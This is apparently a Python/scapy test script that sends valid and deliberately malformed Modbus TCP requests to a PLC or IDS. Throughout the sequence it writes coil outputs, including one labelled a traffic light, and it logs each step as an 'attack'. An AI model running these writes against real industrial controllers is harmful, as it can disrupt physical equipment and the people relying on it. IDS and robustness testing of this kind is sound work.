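#!/usr/bin/env python
# v0.0.5
"""Send a scripted sequence of valid and deliberately malformed Modbus TCP
requests to one destination so that the behaviour of the PLC, or of an IDS in
front of it, can be observed while the traffic is known.

The sequence is: poll the inputs, then twice over {single-coil writes, poll,
malformed multiple-register write, poll, multiple-coil writes, poll}.  All
requests go over one TCP connection wrapped in scapy's StreamSocket.

Usage:  TestScheme.py DST_IP DST_PORT
"""
from scapy.all import *
import argparse
import socket
import time

# Loads scapy's Modbus contrib layer so the ModbusADURequest / ModbusPDU*
# classes used below resolve; must run before any of them is referenced.
load_contrib('modbus')

# Not referenced by this script; kept so anything that imports it keeps working.
NUM_PACKETS_TO_SNIFF = 100

# Timing and repetition constants, taken from the original hard-coded values.
POLL_ROUNDS = 5          # read rounds between each write step
POLL_DELAY = 0.5         # seconds between read rounds
WRITE_GAP = 1.0          # seconds between the "low" and "high" write of a pair
POST_STEP_DELAY = 0.5    # seconds after each write step before polling again
SEQUENCE_REPEATS = 2     # the write/poll cycle is run this many times

# --- Request packets (built once, the same objects are sent each time) -------
# Normal behaviour - read the 3 coils
read_coils = ModbusADURequest() / ModbusPDU01ReadCoilsRequest(startAddr=0, quantity=3)
# Normal behaviour - read the button input
read_discrete_inputs = ModbusADURequest() / ModbusPDU02ReadDiscreteInputsRequest(startAddr=2, quantity=1)
# Well-formed writes to coil address 2 (the coil the original labels "green tlight")
write_coil_low = ModbusADURequest() / ModbusPDU05WriteSingleCoilRequest(outputAddr=2, outputValue=0)
write_coil_high = ModbusADURequest() / ModbusPDU05WriteSingleCoilRequest(outputAddr=2, outputValue=1)
write_multiple_coils_low = ModbusADURequest() / ModbusPDU0FWriteMultipleCoilsRequest(outputsValue=[0], startingAddr=2, quantityOutput=1)
write_multiple_coils_high = ModbusADURequest() / ModbusPDU0FWriteMultipleCoilsRequest(outputsValue=[1], startingAddr=2, quantityOutput=1)
# Deliberately inconsistent request: quantityRegisters claims 5 registers but
# outputsValue carries a single value.  The mismatch IS the malformed test
# case, so it must not be "corrected".  (The original wrote the count as 5L,
# a Python 2 long literal; a plain int packs identically.)
errorpacket = ModbusADURequest() / ModbusPDU10WriteMultipleRegistersRequest(startingAddr=1, outputsValue=[13], quantityRegisters=5)


def build_parser():
    """Return the command-line parser: positional dst_ip and integer dst_port."""
    parser = argparse.ArgumentParser(description="Sends a variety of valid and invalid Modbus TCP packets from an 'attacker' to a user-defined IP address to test robustness of a PLC or IDS.")
    parser.add_argument("dst_ip", help="IP address of Modbus PLC or IDS to test.")
    parser.add_argument("dst_port", type=int, help="Port that the Modbus TCP service is running on the destination machine. If unsure, use port 502.")
    return parser


def poll_inputs(stream, rounds=POLL_ROUNDS):
    """Read the coils and the discrete input `rounds` times over `stream`.

    Responses from stream.sr() are discarded, as in the original.
    """
    # NOTE(review): the rendered original had its indentation stripped; the
    # sleep is assumed to sit inside the loop (one pause per round). Confirm
    # against the repository copy.
    for _ in range(rounds):
        stream.sr(read_coils)
        stream.sr(read_discrete_inputs)
        time.sleep(POLL_DELAY)


def send_coil_writes(stream):
    """Write coil 2 low, then high, using single-coil (function 05) requests."""
    stream.sr(write_coil_low)
    time.sleep(WRITE_GAP)
    stream.sr(write_coil_high)
    print("Sent Coil Write Attack")
    time.sleep(POST_STEP_DELAY)


def send_malformed_register_write(stream):
    """Send the inconsistent multiple-register write (the malformed case)."""
    stream.sr(errorpacket)
    print("Sent Coil Malformed Packet Attack")
    time.sleep(POST_STEP_DELAY)


def send_multiple_coil_writes(stream):
    """Write coil 2 low, then high, using multiple-coil (function 0F) requests."""
    stream.sr(write_multiple_coils_low)
    time.sleep(WRITE_GAP)
    stream.sr(write_multiple_coils_high)
    print("Sent Multiple Coil Write Attack")
    time.sleep(POST_STEP_DELAY)


def run_sequence(stream, repeats=SEQUENCE_REPEATS):
    """Run the whole test sequence over an already-connected StreamSocket.

    The original script spelled the cycle out twice by hand; the order of
    sends and sleeps here is identical to that listing.
    """
    poll_inputs(stream)
    for _ in range(repeats):
        send_coil_writes(stream)
        poll_inputs(stream)
        send_malformed_register_write(stream)
        poll_inputs(stream)
        send_multiple_coil_writes(stream)
        poll_inputs(stream)


def main(argv=None):
    """Parse arguments, open the TCP connection, run the sequence, close up.

    argv: optional argument list; None means sys.argv[1:] (argparse default).
    """
    args = build_parser().parse_args(argv)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Honour dst_port: the original parsed it but always connected to 502.
        sock.connect((args.dst_ip, args.dst_port))
        stream = StreamSocket(sock)
        run_sequence(stream)
    finally:
        # The original never closed the socket; close it even on a failure
        # part-way through the sequence.
        sock.close()


if __name__ == "__main__":
    main()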